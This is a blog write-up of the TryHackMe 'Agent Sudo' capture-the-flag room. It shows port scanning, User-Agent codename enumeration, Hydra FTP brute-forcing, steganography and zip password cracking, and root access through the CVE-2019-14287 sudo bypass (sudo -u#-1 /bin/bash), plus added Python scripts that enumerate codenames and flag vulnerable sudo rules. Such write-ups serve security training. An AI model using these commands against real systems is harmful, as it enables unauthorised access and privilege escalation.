Agent Sudo — TryhackMe WriteUp

Wilklins Nyatteng
Published in System Weakness
8 min read, Aug 18, 2023

Hello readers, let’s dive into the depths of cyber intrigue with ‘Agent Sudo’, a captivating easy-rated room on TryHackMe. Imagine yourself as a digital deep-sea explorer, tasked with infiltrating a hidden server shrouded in mystery. Unearth secrets and uncover the truth in this thrilling hacking challenge.

DESCRIPTION: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

I started with a full TCP port scan in Nmap. There are 3 open ports:

└─$ nmap --min-rate 1000 -p- 10.10.214.103    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 13:25 EAT
Nmap scan report for 10.10.214.103
Host is up (0.29s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 68.30 seconds

Next I ran a service and version scan (-A) against the three open ports.

└─$ nmap -p21,22,80 -A 10.10.214.103      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 13:27 EAT
Nmap scan report for 10.10.214.103
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.34 seconds

I then enumerated the services running on each port.

FTP (Port 21)

I first checked whether anonymous FTP login was allowed, but it was not.

└─$ ftp 10.10.214.103
Connected to 10.10.214.103.
220 (vsFTPd 3.0.3)
Name (10.10.214.103:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.

HTTP (Port 80)

I opened the IP in a browser and found a message on the site.

The message, from Agent R, says to use your own codename as user-agent to access the site. Since the server keys on the User-Agent header, I started Burp Suite so I could edit that header in the intercepted request. (The image below shows the request with the default User-Agent.)

First I set the User-Agent to R and got the message: What are you doing! Are you one of the 25 employees? If not, I going to report this incident. That suggested the codenames are single letters, so I tried each letter of the alphabet as the User-Agent value in turn.

On reaching the letter C, the response pointed to a new path, /agent_C_attention.php.

Accessing that page reveals the username chris and mentions another agent, Agent J.
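The letter-by-letter User-Agent test above can be scripted. The Python below is an added example for this writeup, not code from the room or its author: it sends one request per uppercase letter, keeps redirects unfollowed so the Location header stays visible, and reports every codename whose response differs from a normal browser's. The default target URL is an assumption (it defaults to the box's IP used above).

```python
"""Enumerate single-letter codenames in the User-Agent header and report the
ones the server treats differently. Added example for this writeup; not the
room's or the author's code. The default target URL is an assumption."""
from __future__ import annotations

import string
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Reply:
    status: int
    location: Optional[str]   # Location header if the server answered with a redirect
    body: str


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them: the Location header
    (a path such as agent_C_attention.php) is exactly the signal we want."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url: str, user_agent: str, timeout: float = 10.0) -> Reply:
    """GET url with the given User-Agent and return status, Location and body."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return Reply(resp.status, resp.headers.get("Location"),
                         resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:   # 3xx/4xx/5xx all land here
        return Reply(err.code, err.headers.get("Location"),
                     err.read().decode("utf-8", "replace"))


def find_interesting(replies: Dict[str, Reply], baseline: Reply) -> Dict[str, str]:
    """Map codename -> reason for every reply that differs from the baseline
    (a normal browser User-Agent) in redirect target, status or body."""
    hits: Dict[str, str] = {}
    for name, r in replies.items():
        if r.location and r.location != baseline.location:
            hits[name] = f"redirect -> {r.location}"
        elif r.status != baseline.status:
            hits[name] = f"status {r.status}"
        elif r.body != baseline.body:
            hits[name] = "different body"
    return hits


def enumerate_codenames(url: str, names: str = string.ascii_uppercase) -> Dict[str, str]:
    """Fetch the page once per codename and diff each reply against a browser baseline."""
    baseline = fetch(url, "Mozilla/5.0")
    return find_interesting({n: fetch(url, n) for n in names}, baseline)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.214.103/"
    for codename, why in enumerate_codenames(target).items():
        print(f"User-Agent: {codename}  {why}")
```

Run it as python3 ua_enum.py http://10.10.214.103/. Diffing status, Location and body against the baseline catches a redirect as well as a changed page, which matters when a hit like /agent_C_attention.php arrives in a Location header rather than in the body.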

I guessed chris was the FTP user, so I used Hydra with rockyou.txt to brute-force the password.

└─$ hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.214.103 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-17 13:58:32
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.214.103:21/
[STATUS] 224.00 tries/min, 224 tries in 00:01h, 14344175 to do in 1067:17h, 16 active
[21][ftp] host: 10.10.214.103 login: chris password: (REDACTED)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-17 13:59:51

I logged in successfully and listed the contents of the FTP server: a text file and two images.

└─$ ftp 10.10.214.103
Connected to 10.10.214.103.
220 (vsFTPd 3.0.3)
Name (10.10.214.103:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16915|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp>

I then downloaded all three files to my local machine with mget, in the same session:

ftp> mget To_agentJ.txt cute-alien.jpg cutie.png
mget To_agentJ.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||24166|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************| 217 909.50 KiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (0.71 KiB/s)
mget cute-alien.jpg [anpqy?]? y
229 Entering Extended Passive Mode (|||9683|)
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
100% |***********************************************************************| 33143 50.16 KiB/s 00:00 ETA
226 Transfer complete.
33143 bytes received in 00:00 (34.10 KiB/s)
mget cutie.png [anpqy?]? y
229 Entering Extended Passive Mode (|||35392|)
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
100% |***********************************************************************| 34842 55.21 KiB/s 00:00 ETA
226 Transfer complete.
34842 bytes received in 00:00 (37.04 KiB/s)
ftp>

I started with the text file:

  • To_agentJ.txt
└─$ cat To_agentJ.txt         
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C
  • cute-alien.jpg

I ran steghide info on the JPEG, which showed it needs a passphrase to extract the embedded data (with none, extraction fails).

└─$ steghide info cute-alien.jpg 
"cute-alien.jpg":
format: jpeg
capacity: 1.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

I used StegCracker with rockyou.txt to brute-force the passphrase.

└─$ stegcracker cute-alien.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2023 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'cute-alien.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: (REDACTED)
Tried 441075 passwords
Your file has been written to: cute-alien.jpg.out
Area51

The steghide passphrase is Area51.

The extracted file is a message to Agent J, whose username is james, and it contains his login password.

└─$ cat cute-alien.jpg.out 
Hi james,

Glad you find this message. Your login password is (REDACTED)

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
  • cutie.png

Next I ran binwalk on the PNG; it found an encrypted zip archive (containing To_agentR.txt) appended after the image data.

└─$ binwalk cutie.png   

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
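binwalk's report says the zip begins after the PNG data. As an added example (not the author's code), the Python below does the same carve by hand: it walks the PNG chunks to IEND, looks for a ZIP local-file header after it, and lists the entries with their encryption flag, the flag binwalk reported as "encrypted" for To_agentR.txt. The 1x1 PNG and the small zip it builds for the demo are constructed and are not the room's cutie.png; pass a path to run it against a real file.

```python
"""Do by hand what binwalk reported for cutie.png: walk the PNG chunks to the
IEND marker and parse whatever ZIP archive was appended after it. Added
example for this writeup, not the author's code. The PNG and ZIP built in
make_sample() are constructed for the demo; they are not the room's files."""
import io
import struct
import zipfile
import zlib
from typing import List, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
SAMPLE_NOTE = b"placeholder note, constructed for this example"


def png_end_offset(data: bytes) -> int:
    """Return the offset just past the IEND chunk. Each chunk is
    4-byte length, 4-byte type, payload, 4-byte CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4
        if ctype == b"IEND":
            return pos
    raise ValueError("IEND chunk not found")


def trailing_zip(data: bytes) -> Tuple[int, List[Tuple[str, bool, int]]]:
    """Locate a ZIP appended after the image and list its entries as
    (name, encrypted?, uncompressed size). Returns (-1, []) if none is there.
    Bit 0 of the general-purpose flag is the ZIP 'encrypted' bit. zipfile is
    handed the whole blob: it finds the end-of-central-directory record from
    the end and tolerates the leading image bytes."""
    start = png_end_offset(data)
    off = data.find(ZIP_LOCAL_HEADER, start)
    if off == -1:
        return -1, []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        entries = [(zi.filename, bool(zi.flag_bits & 0x1), zi.file_size)
                   for zi in zf.infolist()]
    return off, entries


def make_sample(append_zip: bool = True) -> bytes:
    """A 1x1 PNG, optionally with a small ZIP glued on the end (constructed)."""
    def chunk(ctype: bytes, payload: bytes) -> bytes:
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit grayscale
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    png = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    if not append_zip:
        return png
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("To_agentR.txt", SAMPLE_NOTE)
    return png + buf.getvalue()


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample()
    offset, found = trailing_zip(blob)
    print(f"image ends at {png_end_offset(blob)}, zip local header at {offset}")
    for name, enc, size in found:
        print(f"  {name}: {'encrypted' if enc else 'plain'}, {size} bytes")
```

The standard library cannot write encrypted zips, so the demo archive reports plain; on the real file the flag comes back set, which is why zip2john and john are the next step.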

I extracted it with binwalk -e, which left 8702.zip in the _cutie.png.extracted folder. The archive was password-protected, so I used zip2john to turn it into a hash for john.

└─$ ls
365 365.zlib 8702.zip To_agentR.txt
└─$ zip2john 8702.zip > hash     

┌──(kali㉿kali)-[~/Downloads/THM/AgentSudo/_cutie.png.extracted]
└─$ cat hash
8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip

john cracked it in seconds with its default wordlist (password.lst); the zip password is alien.

└─$ john hash                                                                
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 ASIMD 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien (8702.zip/To_agentR.txt)
1g 0:00:00:02 DONE 2/3 (2023-08-17 14:24) 0.5000g/s 22342p/s 22342c/s 22342C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We now have james's password from the steg message, so I logged in over SSH. His home directory holds user_flag.txt, the user flag.

└─$ ssh james@10.10.214.103
james@10.10.214.103's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Aug 17 11:35:40 UTC 2023

System load: 0.0 Processes: 94
Usage of /: 39.7% of 9.78GB Users logged in: 0
Memory usage: 34% IP address for eth0: 10.10.214.103
Swap usage: 0%


75 packages can be updated.
33 updates are security updates.


Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ ls
Alien_autospy.jpg user_flag.txt
james@agent-sudo:~$ cat user_flag.txt
(REDACTED)

There is an image in the same folder as the user flag. To view it, I exited the SSH session and pulled the file to my local machine with scp.

└─$ scp james@10.10.214.103:Alien_autospy.jpg .
james@10.10.214.103's password:
Alien_autospy.jpg 100% 41KB 16.0KB/s 00:02

I reverse-searched the image using TinEye.

Now we need to escalate privileges. I checked which commands james can run with sudo:

james@agent-sudo:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash

GTFOBins had nothing for this rule, so I searched Google for (ALL, !root) /bin/bash and found the sudo bug it matches (CVE-2019-14287, fixed in sudo 1.8.28): a rule that lets a user run a command as anyone except root can be bypassed by requesting user ID -1 (or 4294967295). That ID is neither named root nor uid 0, so it passes sudo's Runas check, and setresuid(2) treats -1 as "leave unchanged", so the command keeps the uid 0 that sudo already holds. That is also why the root flag message below ends with the tip to always update your machine.

Running it:

james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# whoami
root
root@agent-sudo:~# ls
Alien_autospy.jpg user_flag.txt
root@agent-sudo:~# cd ~
root@agent-sudo:~# ls
Alien_autospy.jpg user_flag.txt
root@agent-sudo:~# cat /root/root.txt
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.

Your flag is
(REDACTED)

By,
DesKel a.k.a Agent R
root@agent-sudo:~#
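To check a box for this rule systematically, here is an added example (not the room's or the author's code) that parses sudo -l output for Runas specs that allow ALL but exclude only root, and only reports them when the sudo version is older than 1.8.28. The sample sudo -l text reproduces the rule shown above plus one constructed rule for contrast; the version banner and the extra rule are assumptions.

```python
"""Check 'sudo -l' output for Runas rules of the form (ALL, !root) and report
which commands the -u#-1 trick would run as root on a sudo older than 1.8.28,
the release that fixed CVE-2019-14287. Added example for this writeup, not the
room's or the author's code; SAMPLE_SUDO_L below is constructed to match what
the writeup shows (the vim rule is invented for contrast)."""
import re
from typing import List, Tuple

FIXED_IN = (1, 8, 28)

# "    (ALL, !root) /bin/bash"  or  "    (root) NOPASSWD: /usr/bin/vim"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_version(banner: str) -> Tuple[int, int, int]:
    """'Sudo version 1.8.21p2' -> (1, 8, 21). The 'pN' suffix is dropped;
    the upstream fix landed in a base release, so three numbers decide."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no sudo version found in banner")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def runas_users(runas: str) -> List[str]:
    """User part of a Runas spec '(user_list : group_list)', split on commas."""
    users = runas.split(":", 1)[0]
    return [u.strip() for u in users.split(",") if u.strip()]


def bypassable_rules(sudo_l_output: str, version: Tuple[int, int, int]) -> List[str]:
    """Commands that 'sudo -u#-1 <cmd>' runs as root: the Runas user list
    allows ALL but excludes only root by name. Uid -1 matches neither 'root'
    nor uid 0 in sudo's check, and setresuid(2) treats -1 as 'leave unchanged',
    so the already-root sudo process stays root. Uid-style exclusions such as
    !#0 are not modelled here."""
    if version >= FIXED_IN:
        return []
    hits: List[str] = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        users = runas_users(m.group("runas"))
        if "ALL" in users and "!root" in users:
            hits.append(m.group("cmd").strip())
    return hits


SAMPLE_SUDO_L = r"""Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
    (root) NOPASSWD: /usr/bin/vim
"""

if __name__ == "__main__":
    import subprocess
    version = parse_sudo_version(
        subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout)
    sudo_l = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout
    for cmd in bypassable_rules(sudo_l, version):
        print(f"sudo -u#-1 {cmd}   # runs as root on sudo {'.'.join(map(str, version))}")
```

Treat the version test as a hint only: distributions backport the fix without changing the upstream version string (Ubuntu shipped a patched 1.8.21p2), so the decisive check on a box is whether sudo -u#-1 id prints uid=0.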

About the author

Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.

Follow me on:

Twitter, LinkedIn, Github
